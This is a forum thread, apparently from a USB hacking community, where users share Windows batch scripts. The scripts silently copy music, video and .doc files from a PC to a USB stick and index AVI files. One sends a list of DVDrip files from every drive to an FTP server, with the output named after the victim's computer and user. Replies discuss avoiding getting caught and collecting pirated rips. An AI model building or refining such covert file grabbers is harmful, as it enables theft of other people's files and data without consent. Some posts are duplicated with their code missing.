Usb Music Grabber

neoglow

I wrote this yesterday you put it on your usb device create a folder on it called music and then run this batch script and it will search through the main system drive and copy all music files to your usb device i tried to find a script online but none of the ones that i found would work but this one does i tested it on my usb device.

@echo off

xcopy %systemdrive%*.mp3 music /s

xcopy %systemdrive%*.wma music /s

xcopy %systemdrive%*.aiff music /s

xcopy %systemdrive%*.aac music /s

xcopy %systemdrive%*.mp4 music /s

xcopy %systemdrive%*.doc music /s

exit

This will search through the system drive no matter what letter the drive may be and stores it in the folder marked music.

I do have one question for you guys how would i make a script that would search every drive on a pc? i have 3 disk drives but i can only get it to search my system drive and copy the music files.

I hope you have a very large USB device...

yeah ditto XD .....

however i'd like the idea of having a similar thing on a external HD for lanparty's that would grab divx/xvid dvd rips however there would be a problem coding it cos u cant make a script that differs between dvdrips and for example cams or telesyncs , if everything is right labeled u could try 'n make a script to look for a filename like rantradio-DVDrip-.divx.avi by searching for lets say

*DVDrip*.avi

but still it'd be pretty inefective even when useing the script u dont kno if all the shit ur dling u actually want .....

i'd go for a double pass ....

first time just use a indexer script to kno the contents and after being everywere just put the locations of all the things u want in one dload script and go round for a second pass this time running teh new dloading script.

(i'll post a indexing script in a sec)

here you go this indexes all avi's on the machine to a text file .

it askes wot directory u want to start in to index

wot the index filename should be

and wot the directory should be where the index file should be saved.

@echo off

color 0a

echo.

echo AVI-INDEXER  by DLSS

echo ---------------------

echo %cd%

echo.

set /p directory=what is the directory u want to indext to a file ?:

set /p file=what should the index file be called ?:

set /p save=to what directory should the index file be saved ?:

echo.                    %file% index >> "%save%/%file%.txt"

echo. >> "%save%/%file%.txt"

echo.               generated by AVI-indexer.cmd >> "%save%/%file%.txt"

echo.                  written by DLSS >> "%save%/%file%.txt"

echo.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >> "%save%/%file%.txt"

echo.=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- >> "%save%/%file%.txt"

dir "%directory%/*.avi"/b /s >> "%save%/%file%.txt"

cls

"%save%/%file%.txt"

exit

here's a preview of the output file (this actually is a index of the avi's my E drive ...

i'll modify this to work ideal in the switchblade ...

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesAminam.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesapresskihut.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesArie en Bastiaan II.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesArie en Bastiaan.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesArie_Bastiaan3.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesBaklapTV 2.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesBarry Pooter.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesNicht Rijder.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesOndergronds_Kwadraat.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesSaving Private Henk.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesStaar Wars.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesThe Godfathas.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesThe Matrix Retarded Mastermovies.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesThermometer 4.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesTitanic Mastermovies Stream.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPAminam.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPapresskihut.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPArie en Bastiaan II.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPArie en Bastiaan.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPArie_Bastiaan3.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPBarry Pooter.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPNicht Rijder.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPSaving Private Henk.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPStaar Wars.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPThe Godfathas.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPThe Matrix Retarded Mastermovies.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPThermometer 4.avi

E:l33c4 pr0t0c0l4ngrapige filmpjesmastermoviesPMPTitanic Mastermovies Stream.avi

Mastermovies FTW :P

I don't think that these scripts are really useful, since it will take ages to copy everything to your USB drive/external HDD. Maybe the USB/MP3 one could be done, if you'd buy one of those 4 gig cruzer micro's, that would take care of most of the problems :wink:

I have a 10gig usb hard drive its a 3.5 laptop hard drive in a usb caddy so it will copy alot of music.

im not sure about finding certain rips but my script will find avi files just change mp3 in my script to avi

Yeah, I think it's useful, you can always customize it to download whatever files you want.

I cannot see any practical use for this. Copy large files like movies on a usb hard drive is beyond slow and you would be caught before you finish one video. It would be better if you can make it like hack saw instead of a cmdline email client you could upload the files on a ftp server.

I cannot see any practical use for this. Copy large files like movies on a usb hard drive is beyond slow and you would be caught before you finish one video. It would be better if you can make it like hack saw instead of a cmdline email client you could upload the files on a ftp server.

ok so i can easily do that , but where does the average person get a large ftp server ? and if it gets found and they look in the ftp file your username and pass would be compromised ....

@echo off

color 0a

echo.

echo DVDrip-INDEXER  by DLSS

echo ------------------------------

echo %cd%

echo.

set file=%COMPUTERNAME%-%USERNAME%

set save=savelocation-(location-of-script)

set ftp-server=ftp.yourserver.com

set ftp-user=yourusername

set ftp-pass=yourpassword

echo %ftp-user% >> "%file%.ftp"

echo %ftp-pass% >> "%file%.ftp"

echo prompt off >> "%file%.ftp"

# problem ! i need to put mget "

# in front of each line and 

# " after each line ....

dir "C:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"

dir "D:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"

dir "E:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"

dir "F:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"

dir "G:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"

dir "H:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"

dir "I:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"

# etc

cls

FTP -s:%file%.ftp %ftp-server%

exit

• 2 weeks later...
I wrote this yesterday you put it on your usb device create a folder on it called music and then run this batch script and it will search through the main system drive and copy all music files to your usb device i tried to find a script online but none of the ones that i found would work but this one does i tested it on my usb device.
@echo off

exit

This will search through the system drive no matter what letter the drive may be and stores it in the folder marked music.

I do have one question for you guys how would i make a script that would search every drive on a pc? i have 3 disk drives but i can only get it to search my system drive and copy the music files.

i tried this batch script in vista and well... it left alot to be desired... i will try it on an xp machine when i go home tomarrow! anyway does anyone know why it would have failed?

@echo off

exit

i tried this batch script in vista and well... it left alot to be desired... i will try it on an xp machine when i go home tomarrow! anyway does anyone know why it would have failed?

Well what happened when you tried it?

I rather not do the transfer because I only have 6.50 gigs of music on my current machine. I do not need it cluttering up my Maxtor 80GB external hard drive but thanks for the tutorial on how to do this. It could really come in handy one day if I ever need to transfer something in large quantity. :twisted:

• 7 months later...